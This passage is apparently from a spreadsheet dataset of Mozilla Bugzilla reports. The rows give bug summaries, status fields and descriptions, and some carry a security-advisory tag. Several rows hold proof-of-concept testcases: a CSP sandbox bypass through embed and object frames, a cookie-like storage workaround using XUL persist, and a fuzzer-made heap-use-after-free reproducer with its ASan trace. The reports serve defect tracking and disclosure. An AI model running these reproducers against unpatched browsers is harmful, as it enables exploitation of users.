    #12 0x7f9620497295 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:838
    #13 0x7f9620494f8a in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicLayerManager.cpp:931
    #14 0x7f96204922b9 in mozilla::layers::BasicLayerManager::EndTransactionInternal(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/basic/BasicLayerManager.cpp:589
    #15 0x7f961d4ba9fb in nsDisplayList::PaintForFrame(nsDisplayListBuilder*, nsRenderingContext*, nsIFrame*, unsigned int) const layout/base/nsDisplayList.cpp:1098
    #16 0x7f961d4b9751 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) const layout/base/nsDisplayList.cpp:966
    #17 0x7f961d531253 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) layout/base/nsLayoutUtils.cpp:1835
    #18 0x7f961d79c4e7 in nsSimplePageSequenceFrame::PrintNextPage() layout/generic/nsSimplePageSequence.cpp:763
    #19 0x7f961ec11ef3 in nsPrintEngine::PrintPage(nsPrintObject*, bool&amp;) layout/printing/nsPrintEngine.cpp:2824
    #20 0x7f961ec177d3 in nsPagePrintTimer::Run() layout/printing/nsPagePrintTimer.cpp:87
    #21 0x7f96202d4251 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:612
    #22 0x7f962020d073 in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:220
    #23 0x7f961fdd1ce0 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #24 0x7f962036281b in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:208
Shadow byte and word:
  0x1ff2ba4f8a10: fd
  0x1ff2ba4f8a10: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ff2ba4f89f0: fa fa fa fa fa fa fa fa
  0x1ff2ba4f89f8: fa fa fa fa fa fa fa fa
  0x1ff2ba4f8a00: fa fa fa fa fa fa fa fa
  0x1ff2ba4f8a08: fa fa fa fa fa fa fa fa
=&gt;0x1ff2ba4f8a10: fd fd fd fd fd fd fd fd
  0x1ff2ba4f8a18: fd fd fd fd fd fd fd fd
  0x1ff2ba4f8a20: fd fd fd fd fd fd fd fd
  0x1ff2ba4f8a28: fd fd fd fd fd fd fd fd
  0x1ff2ba4f8a30: fd fd fd fd fd fd fd fd
Stats: 905M malloced (979M for red zones) by 1833862 calls
Stats: 105M realloced by 83665 calls
Stats: 837M freed by 1481377 calls
Stats: 699M really freed by 1274702 calls
Stats: 868M (222350 full pages) mmaped in 215 calls
  mmaps   by size class: 8:770001; 9:65528; 10:32760; 11:20470; 12:8192; 13:6144; 14:1792; 15:640; 16:1216; 17:1248; 18:336; 19:56; 20:24; 21:22; 22:5; 23:2;
  mallocs by size class: 8:1485067; 9:165298; 10:82797; 11:55504; 12:19877; 13:11914; 14:5299; 15:1882; 16:2399; 17:2909; 18:653; 19:160; 20:55; 21:38; 22:7; 23:3;
  frees   by size class: 8:1168626; 9:145581; 10:75352; 11:50174; 12:17771; 13:11299; 14:4892; 15:1747; 16:2233; 17:2853; 18:596; 19:155; 20:53; 21:37; 22:6; 23:2;
  rfrees  by size class: 8:1006654; 9:124075; 10:64219; 11:44235; 12:14331; 13:10277; 14:4368; 15:1477; 16:1972; 17:2358; 18:550; 19:108; 20:45; 21:27; 22:5; 23:1;
Stats: malloc large: 3825 small slow: 8875
==6937== ABORTING</t>
        </is>
      </c>
      <c r="X2069" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2070">
      <c r="A2070" t="n">
        <v>1473505</v>
      </c>
      <c r="B2070" t="inlineStr">
        <is>
          <t>2018-07-05 02:09:04 -0700</t>
        </is>
      </c>
      <c r="C2070" t="inlineStr">
        <is>
          <t>ctrl + click on job failures adds them to pinboard but doesn't open it</t>
        </is>
      </c>
      <c r="D2070" t="inlineStr">
        <is>
          <t>2018-07-05 17:24:35 -0700</t>
        </is>
      </c>
      <c r="E2070" t="n">
        <v>1</v>
      </c>
      <c r="F2070" t="n">
        <v>1</v>
      </c>
      <c r="G2070" t="n">
        <v>7</v>
      </c>
      <c r="H2070" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2070" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2070" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K2070" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2070" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2070" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2070" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2070" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2070" t="inlineStr"/>
      <c r="Q2070" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2070" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2070" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2070" t="n">
        <v>1</v>
      </c>
      <c r="U2070" t="n">
        <v>0</v>
      </c>
      <c r="V2070" t="n">
        <v>3</v>
      </c>
      <c r="W2070" t="inlineStr">
        <is>
          <t>Steps to reproduce:
Ctrl + click on any failure while the bottom view with the job details is hidden.
Actual result:
Job details view + pinboard not opened. Manually checking reveals the job gets added to the pinboard.
Expected result:
Pinboard opened (so one can see the jobs added to the pinboard).</t>
        </is>
      </c>
      <c r="X2070" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2071">
      <c r="A2071" t="n">
        <v>1738418</v>
      </c>
      <c r="B2071" t="inlineStr">
        <is>
          <t>2021-10-29 01:30:56 -0700</t>
        </is>
      </c>
      <c r="C2071" t="inlineStr">
        <is>
          <t>&lt;embed/object&gt; frames bypass parent's CSP `sandbox` header directive</t>
        </is>
      </c>
      <c r="D2071" t="inlineStr">
        <is>
          <t>2024-05-30 10:50:16 -0700</t>
        </is>
      </c>
      <c r="E2071" t="n">
        <v>1</v>
      </c>
      <c r="F2071" t="n">
        <v>1</v>
      </c>
      <c r="G2071" t="n">
        <v>3</v>
      </c>
      <c r="H2071" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2071" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2071" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2071" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2071" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2071" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2071" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2071" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2071" t="inlineStr">
        <is>
          <t>[domsecurity-active][post-critsmash-triage][adv-main95+][adv-ESR91.4.0+]</t>
        </is>
      </c>
      <c r="Q2071" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2071" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2071" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T2071" t="n">
        <v>1</v>
      </c>
      <c r="U2071" t="n">
        <v>0</v>
      </c>
      <c r="V2071" t="n">
        <v>26</v>
      </c>
      <c r="W2071" t="inlineStr">
        <is>
          <t>A given `Content-Security-Policy: sandbox ...;` HTTP header directive is not correctly enforced for `&lt;embed&gt;` and `&lt;object&gt;` child frames during load, allowing to bypass the set restrictions.
### Test case
`parent.html`:
```html
Content-Security-Policy: sandbox
&lt;iframe src="child.html"&gt;&lt;/iframe&gt;
&lt;embed src="child.html"&gt;&lt;/embed&gt;
&lt;object data="child.html"&gt;&lt;/object&gt;
```
`child.html`:
```html
&lt;script&gt;prompt(document.domain)&lt;/script&gt;
```
### Expected result
Per the blanket `sandbox` directive, all three child frames should be treated as cross-origin loads and be denied script execution.
### Actual result
The `&lt;embed&gt;` and `&lt;object&gt;` children are able to execute same-origin script code.
CSP3 spec [reference](https://www.w3.org/TR/CSP3/#directive-sandbox):
&gt;  **6.2.2. sandbox**
&gt; The sandbox directive specifies an HTML sandbox policy which the user agent will apply to a resource, just as though it had been included in an `iframe` with a `sandbox` property.
I will follow up with additional details to the root cause.</t>
        </is>
      </c>
      <c r="X2071" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2072">
      <c r="A2072" t="n">
        <v>508927</v>
      </c>
      <c r="B2072" t="inlineStr">
        <is>
          <t>2009-08-06 17:25:09 -0700</t>
        </is>
      </c>
      <c r="C2072" t="inlineStr">
        <is>
          <t>"ASSERTION: returning frame that is not in childlist" with xul:listboxbody, XBL</t>
        </is>
      </c>
      <c r="D2072" t="inlineStr">
        <is>
          <t>2010-02-08 19:49:04 -0800</t>
        </is>
      </c>
      <c r="E2072" t="n">
        <v>1</v>
      </c>
      <c r="F2072" t="n">
        <v>1</v>
      </c>
      <c r="G2072" t="n">
        <v>3</v>
      </c>
      <c r="H2072" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2072" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2072" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2072" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2072" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2072" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2072" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2072" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2072" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2072" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2072" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2072" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2072" t="n">
        <v>1</v>
      </c>
      <c r="U2072" t="n">
        <v>0</v>
      </c>
      <c r="V2072" t="n">
        <v>36</v>
      </c>
      <c r="W2072" t="inlineStr">
        <is>
          <t>Created attachment 393075
testcase
###!!! ASSERTION: returning frame that is not in childlist: '!result-&gt;IsBoxFrame() || result-&gt;GetParent() == this', file /Users/jruderman/central/layout/xul/base/src/nsListBoxBodyFrame.cpp, line 1263
This assertion was added as part of rev 4eb507b977b5 (Bug 488210.  Stop returning non-listitems' frames from GetNextItemBox.)</t>
        </is>
      </c>
      <c r="X2072" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2073">
      <c r="A2073" t="n">
        <v>865948</v>
      </c>
      <c r="B2073" t="inlineStr">
        <is>
          <t>2013-04-25 18:53:46 -0700</t>
        </is>
      </c>
      <c r="C2073" t="inlineStr">
        <is>
          <t>nsScriptSecurityManager::CheckLoadURIWithPrincipal is broken for nsExpandedPrincipal</t>
        </is>
      </c>
      <c r="D2073" t="inlineStr">
        <is>
          <t>2024-05-30 08:02:28 -0700</t>
        </is>
      </c>
      <c r="E2073" t="n">
        <v>1</v>
      </c>
      <c r="F2073" t="n">
        <v>1</v>
      </c>
      <c r="G2073" t="n">
        <v>3</v>
      </c>
      <c r="H2073" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2073" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2073" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2073" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2073" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2073" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2073" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2073" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2073" t="inlineStr">
        <is>
          <t>[adv-main21+][adv-esr1708+]</t>
        </is>
      </c>
      <c r="Q2073" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2073" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2073" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T2073" t="n">
        <v>1</v>
      </c>
      <c r="U2073" t="n">
        <v>0</v>
      </c>
      <c r="V2073" t="n">
        <v>33</v>
      </c>
      <c r="W2073" t="inlineStr">
        <is>
          <t>in CheckLoadURIWithPrincipal, we have special handling for nsExpandedPrincipal, in which we iterate over the whitelist, caling CheckLoadURIWithPrincipal on each one individually. But if none of those succeed, we return NS_OK (!!!) instead of a failure code. This means that the nsExpandedPrincipal can load whatever it wants. :-(
I really should have caught this in review. I'm currently investigating why this wasn't caught by our test coverage.</t>
        </is>
      </c>
      <c r="X2073" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2074">
      <c r="A2074" t="n">
        <v>1696138</v>
      </c>
      <c r="B2074" t="inlineStr">
        <is>
          <t>2021-03-03 03:22:53 -0800</t>
        </is>
      </c>
      <c r="C2074" t="inlineStr">
        <is>
          <t>DNS Resolver thread crashes Firefox</t>
        </is>
      </c>
      <c r="D2074" t="inlineStr">
        <is>
          <t>2024-05-30 10:28:24 -0700</t>
        </is>
      </c>
      <c r="E2074" t="n">
        <v>1</v>
      </c>
      <c r="F2074" t="n">
        <v>1</v>
      </c>
      <c r="G2074" t="n">
        <v>3</v>
      </c>
      <c r="H2074" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2074" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2074" t="inlineStr">
        <is>
          <t>Networking: DNS</t>
        </is>
      </c>
      <c r="K2074" t="inlineStr">
        <is>
          <t>Firefox 86</t>
        </is>
      </c>
      <c r="L2074" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2074" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2074" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2074" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2074" t="inlineStr">
        <is>
          <t>[necko-triaged][reporter-external][sec-survey][adv-main91+][adv-esr78.13+]</t>
        </is>
      </c>
      <c r="Q2074" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2074" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2074" t="inlineStr">
        <is>
          <t>91 Branch</t>
        </is>
      </c>
      <c r="T2074" t="n">
        <v>1</v>
      </c>
      <c r="U2074" t="n">
        <v>0</v>
      </c>
      <c r="V2074" t="n">
        <v>32</v>
      </c>
      <c r="W2074" t="inlineStr">
        <is>
          <t>Created attachment 9206593
trouble.txt
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Steps to reproduce:
Linux Mint 20 64 bit, last apt upgrade Mar 1
Goto tiktok.com and scroll videos
(did that with versions 82, 84, and 86)
Actual results:
After a time, Firefox crashes totally (SIGSEGV), see bug ids in trouble.txt
Last bug report bp-9e9034a9-f2bf-42e5-98a3-a1b300210303
DNS over HTTPS is switched off, but when it is switched on (Cloudfare), this problem occurs more often
The reports show a problem in the DNS Resolver thread, mostly in the call to PR_GetAddrInfoByName 
Tests were also done with new profiles
Troubleshooting information attached (trouble.txt)
Mint 20 was installed in Sep 20, and was regularly updated/upgraded
(No user changes to resolver functionality)
Expected results:
I expect Firefox not to crash, and handle the malfunctioning call correctly ;)</t>
        </is>
      </c>
      <c r="X2074" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2075">
      <c r="A2075" t="n">
        <v>295994</v>
      </c>
      <c r="B2075" t="inlineStr">
        <is>
          <t>2005-05-30 13:24:31 -0700</t>
        </is>
      </c>
      <c r="C2075" t="inlineStr">
        <is>
          <t>Can store cookie-like information via xul persist attribute</t>
        </is>
      </c>
      <c r="D2075" t="inlineStr">
        <is>
          <t>2009-06-29 14:37:03 -0700</t>
        </is>
      </c>
      <c r="E2075" t="n">
        <v>1</v>
      </c>
      <c r="F2075" t="n">
        <v>1</v>
      </c>
      <c r="G2075" t="n">
        <v>3</v>
      </c>
      <c r="H2075" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2075" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2075" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2075" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2075" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2075" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2075" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2075" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2075" t="inlineStr">
        <is>
          <t>[sg:low][dbaron-1.9:RsCe]</t>
        </is>
      </c>
      <c r="Q2075" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2075" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2075" t="inlineStr">
        <is>
          <t>mozilla1.9.1b2</t>
        </is>
      </c>
      <c r="T2075" t="n">
        <v>1</v>
      </c>
      <c r="U2075" t="n">
        <v>0</v>
      </c>
      <c r="V2075" t="n">
        <v>133</v>
      </c>
      <c r="W2075" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.8) Gecko/20050511
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.8) Gecko/20050511
When user turns off cookies, I still can write cookie-like information by using
the xul persist attribute on a remote page.
Reproducible: Always
Steps to Reproduce:
&lt;xul:element id="test" persist="att1,att2" /&gt;
Store:
document.getElementById('test').setAttribute('att1','xxx');
Restore:
alert(document.getElementById('test').getAttribute('att1'));
Expected Results:  
I expect a remote XUL page being able to work with the persist attribute but
onla when the user allows cookies from this site.</t>
        </is>
      </c>
      <c r="X2075" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2076">
      <c r="A2076" t="n">
        <v>1359547</v>
      </c>
      <c r="B2076" t="inlineStr">
        <is>
          <t>2017-04-25 12:00:19 -0700</t>
        </is>
      </c>
      <c r="C2076" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::IMEContentObserver::HandleQueryContentEvent</t>
        </is>
      </c>
      <c r="D2076" t="inlineStr">
        <is>
          <t>2024-05-30 09:32:17 -0700</t>
        </is>
      </c>
      <c r="E2076" t="n">
        <v>1</v>
      </c>
      <c r="F2076" t="n">
        <v>1</v>
      </c>
      <c r="G2076" t="n">
        <v>3</v>
      </c>
      <c r="H2076" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2076" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2076" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K2076" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L2076" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2076" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2076" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2076" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2076" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q2076" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2076" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2076" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T2076" t="n">
        <v>1</v>
      </c>
      <c r="U2076" t="n">
        <v>0</v>
      </c>
      <c r="V2076" t="n">
        <v>19</v>
      </c>
      <c r="W2076" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox ESR 52.1.0 (20170417135202). It requires the fuzzPriv extension.
&lt;script&gt;
function start() {
        o2=document;
        o38=document.createElement('input');
        o56=document.createElement('form');
        o38.innerHTML='&lt;keygen name=style&gt;';
        o392=document.createElement('iframe');
        o2.designMode='on';
        o56.appendChild(o38);
        o392.style.position='fixed';
        o443=document.createElement('frameset');
        o444=document.createElement('audio');
        o445=document.createElement('track');
        o444.appendChild(o445);
        o2.write('&lt;div&gt;');
        o444.controls^=1;
        o2.documentElement.appendChild(o444);
        o443.onerror=fun1;
        document.documentElement.appendChild(o392);
        document.documentElement.style.transform='scale(1)';
        fuzzPriv.trustedKeyEvent(document.documentElement,'press',false,false,true,false,37,0);
}
var c = 0;
function fun1() {
        if(c++&gt;1)return;
        a=new FormData(o56);
        fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
        setTimeout("location.reload();",400);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==25393==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000032330 at pc 0x7f2fe84e5e22 bp 0x7fff07127cf0 sp 0x7fff07127ce8
READ of size 8 at 0x612000032330 thread T0
    #0 0x7f2fe84e5e21 in operator bool /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:763:45
    #1 0x7f2fe84e5e21 in IsInitializedWithPlugin /home/worker/workspace/build/src/dom/events/IMEContentObserver.h:136
    #2 0x7f2fe84e5e21 in mozilla::IMEContentObserver::HandleQueryContentEvent(mozilla::WidgetQueryContentEvent*) /home/worker/workspace/build/src/dom/events/IMEContentObserver.cpp:777
    #3 0x7f2fe842e160 in mozilla::EventStateManager::HandleQueryContentEvent(mozilla::WidgetQueryContentEvent*) /home/worker/workspace/build/src/dom/events/EventStateManager.cpp:900:5
    #4 0x7f2fe842bade in mozilla::EventStateManager::PreHandleEvent(nsPresContext*, mozilla::WidgetEvent*, nsIFrame*, nsIContent*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventStateManager.cpp:610:5
    #5 0x7f2fea6caae9 in PresShell::HandleEventInternal(mozilla::WidgetEvent*, nsEventStatus*, bool) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:8254:10
    #6 0x7f2fea6c6964 in PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*, nsIContent**) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:7980:12
    #7 0x7f2fea6c36e1 in PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*, nsIContent**) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:7468:16
    #8 0x7f2fe9c8c66f in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /home/worker/workspace/build/src/view/nsViewManager.cpp:815:7
    #9 0x7f2fe9c849c0 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) /home/worker/workspace/build/src/view/nsView.cpp:1117:5
    #10 0x7f2fe9d40088 in nsWindow::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&amp;) /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:582:17
    #11 0x7f2fe9d6b078 in nsWindow::ExecuteNativeKeyBinding(nsIWidget::NativeKeyBindingsType, mozilla::WidgetKeyboardEvent const&amp;, void (*)(mozilla::Command, void*), void*) /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:6487:9
    #12 0x7f2fe9e79093 in mozilla::EditorEventListener::KeyPress(nsIDOMKeyEvent*) /home/worker/workspace/build/src/editor/libeditor/EditorEventListener.cpp:636:18
    #13 0x7f2fe9e76b2f in mozilla::EditorEventListener::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/editor/libeditor/EditorEventListener.cpp:407:14
    #14 0x7f2fe84cf99d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
    #15 0x7f2fe84d13c7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #16 0x7f2fe84bc7b9 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:401:9
    #17 0x7f2fe84bcb6b in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:429:5
    #18 0x7f2fe84bfb88 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #19 0x7f2fe84c1a87 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:780:12
    #20 0x7f2fe676cf01 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1309:5
    #21 0x7f2fe84dc2c0 in mozilla::dom::EventTarget::DispatchEvent(JSContext*, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/events/EventTarget.cpp:73:9
    #22 0x7f2fe7bee79b in mozilla::dom::EventTargetBinding::dispatchEvent(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::EventTarget*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:988:15
    #23 0x7f2fe7beb75c in mozilla::dom::EventTargetBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:1164:13
    #24 0x7f2fee331f55 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #25 0x7f2fee331f55 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #26 0x7f2fee31235f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #27 0x7f2fee31235f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #28 0x7f2fee2f751d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #29 0x7f2fee3325bf in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #30 0x7f2fee332c02 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #31 0x7f2fede02e42 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #32 0x7f2fe51f9c1f in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #33 0x7f2fee331f55 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #34 0x7f2fee331f55 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
